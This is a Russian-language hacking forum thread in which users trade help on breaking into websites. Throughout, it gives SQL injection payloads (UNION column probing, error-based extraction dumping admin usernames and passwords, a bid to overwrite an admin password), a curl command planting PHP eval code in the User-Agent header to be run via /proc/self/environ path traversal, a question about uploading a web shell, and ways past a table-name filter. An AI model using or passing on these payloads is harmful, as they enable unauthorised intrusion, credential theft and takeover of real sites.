идем по порядку: 1) гет параметр передаецо только 1 и это id - других параметров не вижу 2) далее пошли перелопачивать все это(непонятно зачем селект был всего а работаем только с 1м столбцом) 3)потом через это рс начали делать запросы которые должны вернуть только число хотя мускулу пофиг в данном случае и проверок нет надлежащих, но смущает то что вывод происходит по именам столбцов а не по номерам(это и к первому и ко втророму куску кода относицо). 4) Наконец у нас в таблицах происходит выбор разного количества столбцов- а это уже в данном случае только блинда последнее убивает окончательно: PHP: if ($pi2>0) echo ' <i>('.$pi2.')</i>'; если сервер настроен так что не будет выдавацо ошибок мускула то дело тухлое - так как не сможем проверить даже правильный или нет первый запрос
Serbies, вроде я понял как делать. Вот только остался один вопрос , как произвести SQL inj тут? PHP: select COUNT(CODE) as count1 from tbl_base where ISMODER=1 and (SUBKAT1=".$rs['CODE']." or SUBKAT2=".$rs['CODE']." or SUBKAT3=".$rs['CODE'].") $rs['CODE'] получаю от сюда PHP: $rs_2 = mysql_query("select * from tbl_subkat where KATCODE=".$GET['id']." order by POSITION, NAZV",$conn1); while (($rs=mysql_fetch_assoc($rs_2))!==false) { т.е. 1,2,version(),4-- В таблице tbl_base находится 35 колонок
Прошу прощения за возможный оффтоп. Подскажите, пожалуйста, как этот запрос Code: curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=phpinfo();" [B][COLOR=Yellow]-H[/COLOR][/B] "User-Agent: <?php eval(\$_GET[cmd]); ?>" оформить правильно в php и что есть такое ключ -H ? Можно ли эту конструкцию юзать GET-ом в FF и юзерагент там-же менять?
Скажите, если есть возможность выполнить произвольный код на сайте, то как можно залить шелл? Например: Code: http://www.site.com/view=../../../../../../../../../../../../../proc/self/environ%00&cmd=phpinfo%28%29; Каким кодом заменить phpinfo();, чтобы залить шелл?
Имеется запрос: Code: (select+1+from+(select+count(0),concat((select+concat_ws(0x3a,username,password)+from+admins+limit+0,1),floor(rand(0)*2))+from+admins+group+by+2)a)--+ нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.
имеешь ввиду "update admins set password=......" ? насколько я знаю, комбинировать запросы select и update нельзя
помогите, как правильно сделать запрос ? site.com/search/?search=1&search_words=j&search_section_id=25'&search_cond=1&search_numrows=10 DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326
если бы можно было запросом из браузера изменять значения в БД, то я думаю % похеканных сайтов стал намного больше, и раздел рашифровка хешей не нужен был бы совсем...
мда чел .. я это читал и нераз, помогало, но не в этом случае, я хз как здесь делать, комментарием после WHERE (ti.parent_id=2 order by 1/* OR ti.tr_id=2 order by 1/*) (-- ,+--+,#...) нелзя закрыть, а в пидзапросах полохо понимаю потому и запостив мб кто-то знает (мне кажется здесь должен быть пидзапрос).
ага ) (site.com/search/?search=1&search_words=jjh&search_section_id=9999999)+and+ExtractValue(1,concat(0x5c,(user())))--) MySQL Error : XPATH syntax error: '\[email protected]' только теперь непонятно, версия 5.1.41 , а infromation_schema будто нет что это? site.com/search/?search=1&search_words=jjh&search_section_id=9999999)+and+ExtractValue(1,concat(0x5c,(select+schema_name+from+infromation_schema.schemata+limit+1,1)))-- MySQL Error : SELECT command denied to user 'user'@'127.0.0.2' for table 'schemata' .....ExtractValue(1,concat(0x5c,(select+schema_name+from+infromation_schedasdma.schemata+limit+1,1)))-- MySQL Error : SELECT command denied to user 'user'@'127.0.0.2' for table 'schemata' --одинаково потому и думаю что infromation_schema нет
вобщем есть запрос на выборку из таблы ibf_members символ "_"(в имени таблицы) заменяется на "ampersand#95;" и только в тех случаях, когда в строке(имя таблицы) есть "ibf_". в остальных случаях "_" проходит. Есть мысли? И как возможно это обойти? Спасибо. //пробовал с помощью подзапроса - не вышло.
